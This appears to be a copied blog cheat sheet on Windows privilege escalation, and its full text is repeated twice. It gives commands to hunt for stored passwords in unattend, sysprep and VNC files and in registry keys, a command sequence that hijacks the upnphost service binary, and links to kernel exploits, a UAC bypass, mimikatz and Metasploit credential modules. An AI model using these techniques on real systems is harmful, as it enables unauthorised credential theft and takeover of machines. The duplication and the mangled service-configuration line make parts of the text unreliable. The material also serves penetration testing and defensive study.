Windows Privilege Escalation tips
Copy of http://it-ovid.blogspot.co.uk/2012/02/windows-privilege-escalation.html
Stored credentials
Search for credentials within:
c:\unattend.xml
Unattend credentials are stored in base64 and can be decoded manually with base64:
user@host $ base64 -d cABhAHMAcwB3AG8AcgBkAFAAYQBzAHMAdwBvAHIAZAA=
Metasploit Framework enum_unattend module and gather credentials module:
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/enum_unattend.rb
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/credentials/gpp.rb
c:\sysprep.inf
c:\sysprep\sysprep.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
findstr /si password *.txt | *.xml | *.ini
findstr /si pass *.txt | *.xml | *.ini
Password recovery programs - small - RDP, Mail, IE, VNC, Dialup, Protected Storage...
http://www.nirsoft.net/password_recovery_tools.html
Dumping cleartext credentials with mimikatz
http://pauldotcom.com/2012/02/dumping-cleartext-credentials.html
------------------------------------------------------------------------------------------------------
Query the Windows Registry
VNC Stored:
reg query "HKCU\Software\ORL\WinVNC3\Password"
Windows Autologin:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
SNMP Parameters:
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
Putty clear text proxy credentials:
reg query" HKCU\Software\SimonTatham\PuTTY\Sessions"
Search the registry - copy (pipe) to the clipboard (optional)
reg query HKLM /f password /t REG_SZ /s [ |clip]
reg query HKCU /f password /t REG_SZ /s [ |clip]
------------------------------------------------------------------------------------------------------
Insecure GUI apps
running as SYSTEM that can open cmd.exe or directories "files, logfiles" etc.
------------------------------------------------------------------------------------------------------
Directory permissions
cacls
icacls
------------------------------------------------------------------------------------------------------
Sysinternals tools
Check processes and start-up applications with Autoruns and procmon - sysinternals.com
http://technet.microsoft.com/en-us/sysinternals/bb545027
Services pointing to writeable locations
*- orphaned installs - applications not installed that still exist in startup
*- replacing unknown dlls
*- PATH directories with weak permissions - overwrites possible?
sysinternals tools
accesschk.exe -uwcqv *
*- unsecured processes
*- steal process/thread tokens (a'la incognito)
*- hijack handles for write access
------------------------------------------------------------------------------------------------------
Change the upnp service binary
http://lanmaster53.com
sc qc upnphostsc config upnphost binpath= "net user
sc config upnphost obj= ".\LocalSystem" password =""
net stop upnphost
net start upnphost
May work with other services if permissions permit
------------------------------------------------------------------------------------------------------
Vulnerability Privilege Escalation
Windows kernel privilege escalation
KiTrap0D
http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip
Tomcat Windows privilege escalation
http://www.abysssec.com/blog/2008/11/27/tomcat-jrun-privilege-escalation-windows
NtGdiEnableEudc Exploit (MS11-011) - windows XP SP0-3
16262,platforms/windows/dos/16262.,"MS11-011(CVE-2011-0045): MS Windows XP WmiTraceMessageVa Integer Truncation Vulnerability PoC",2011-03-01,"Nikita Tarakanov",windows,dos,0
http://www.securityfocus.com/bid/46136/exploit
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0045
http://downloads.securityfocus.com/vulnerabilities/exploits/46136.c
http://cissrt.blogspot.com/2011/02/cve-2011-0045-ms-windows-xp.html
http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx
Service Tracing Key (MS10-059)
http://www.securityfocus.com/bid/42269/exploit
http://www.argeniss.com/research/ARGENISS-ADV-081002.txt
http://www.securityfocus.com/data/vulnerabilities/exploits/Chimichurri.zip
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2554
Registry Symlink Vuln (MS10-021)
No Public Exploit - VuPEN membership only
Ryujin - ADF.sys priv esc - ms11-080
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2005
http://www.exploit-db.com/exploits/18176
pyinstaller - http://www.pyinstaller.org/
py2exe - http://www.py2exe.org/
UAC Bypass priv esc
http://www.exploit-db.com/exploits/15609
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4398
http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx
http://www.securityfocus.com/bid/45045/info
Additional References and sources and other links:
Encyclopaedia of Windows Privilege escalation - Brett Moor
http://www.ruxcon.org.au/2011-talks/encyclopaedia-of-windows-privilege-escalation/
Stored credentials
Search for credentials within:
c:\unattend.xml
Unattend credentials are stored in base64 and can be decoded manually with base64:
user@host $ base64 -d cABhAHMAcwB3AG8AcgBkAFAAYQBzAHMAdwBvAHIAZAA=
Metasploit Framework enum_unattend module and gather credentials module:
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/enum_unattend.rb
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/credentials/gpp.rb
c:\sysprep.inf
c:\sysprep\sysprep.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
findstr /si password *.txt | *.xml | *.ini
findstr /si pass *.txt | *.xml | *.ini
Password recovery programs - small - RDP, Mail, IE, VNC, Dialup, Protected Storage...
http://www.nirsoft.net/password_recovery_tools.html
Dumping cleartext credentials with mimikatz
http://pauldotcom.com/2012/02/dumping-cleartext-credentials.html
------------------------------------------------------------------------------------------------------
Query the Windows Registry
VNC Stored:
reg query "HKCU\Software\ORL\WinVNC3\Password"
Windows Autologin:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
SNMP Parameters:
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
Putty clear text proxy credentials:
reg query" HKCU\Software\SimonTatham\PuTTY\Sessions"
Search the registry - copy (pipe) to the clipboard (optional)
reg query HKLM /f password /t REG_SZ /s [ |clip]
reg query HKCU /f password /t REG_SZ /s [ |clip]
------------------------------------------------------------------------------------------------------
Insecure GUI apps
running as SYSTEM that can open cmd.exe or directories "files, logfiles" etc.
------------------------------------------------------------------------------------------------------
Directory permissions
cacls
icacls
------------------------------------------------------------------------------------------------------
Sysinternals tools
Check processes and start-up applications with Autoruns and procmon - sysinternals.com
http://technet.microsoft.com/en-us/sysinternals/bb545027
Services pointing to writeable locations
*- orphaned installs - applications not installed that still exist in startup
*- replacing unknown dlls
*- PATH directories with weak permissions - overwrites possible?
sysinternals tools
accesschk.exe -uwcqv *
*- unsecured processes
*- steal process/thread tokens (a'la incognito)
*- hijack handles for write access
------------------------------------------------------------------------------------------------------
Change the upnp service binary
http://lanmaster53.com
sc qc upnphostsc config upnphost binpath= "net user
sc config upnphost obj= ".\LocalSystem" password =""
net stop upnphost
net start upnphost
May work with other services if permissions permit
------------------------------------------------------------------------------------------------------
Vulnerability Privilege Escalation
Windows kernel privilege escalation
KiTrap0D
http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip
Tomcat Windows privilege escalation
http://www.abysssec.com/blog/2008/11/27/tomcat-jrun-privilege-escalation-windows
NtGdiEnableEudc Exploit (MS11-011) - windows XP SP0-3
16262,platforms/windows/dos/16262.,"MS11-011(CVE-2011-0045): MS Windows XP WmiTraceMessageVa Integer Truncation Vulnerability PoC",2011-03-01,"Nikita Tarakanov",windows,dos,0
http://www.securityfocus.com/bid/46136/exploit
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0045
http://downloads.securityfocus.com/vulnerabilities/exploits/46136.c
http://cissrt.blogspot.com/2011/02/cve-2011-0045-ms-windows-xp.html
http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx
Service Tracing Key (MS10-059)
http://www.securityfocus.com/bid/42269/exploit
http://www.argeniss.com/research/ARGENISS-ADV-081002.txt
http://www.securityfocus.com/data/vulnerabilities/exploits/Chimichurri.zip
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2554
Registry Symlink Vuln (MS10-021)
No Public Exploit - VuPEN membership only
Ryujin - ADF.sys priv esc - ms11-080
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2005
http://www.exploit-db.com/exploits/18176
pyinstaller - http://www.pyinstaller.org/
py2exe - http://www.py2exe.org/
UAC Bypass priv esc
http://www.exploit-db.com/exploits/15609
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4398
http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx
http://www.securityfocus.com/bid/45045/info
Additional References and sources and other links:
Encyclopaedia of Windows Privilege escalation - Brett Moor
http://www.ruxcon.org.au/2011-talks/encyclopaedia-of-windows-privilege-escalation/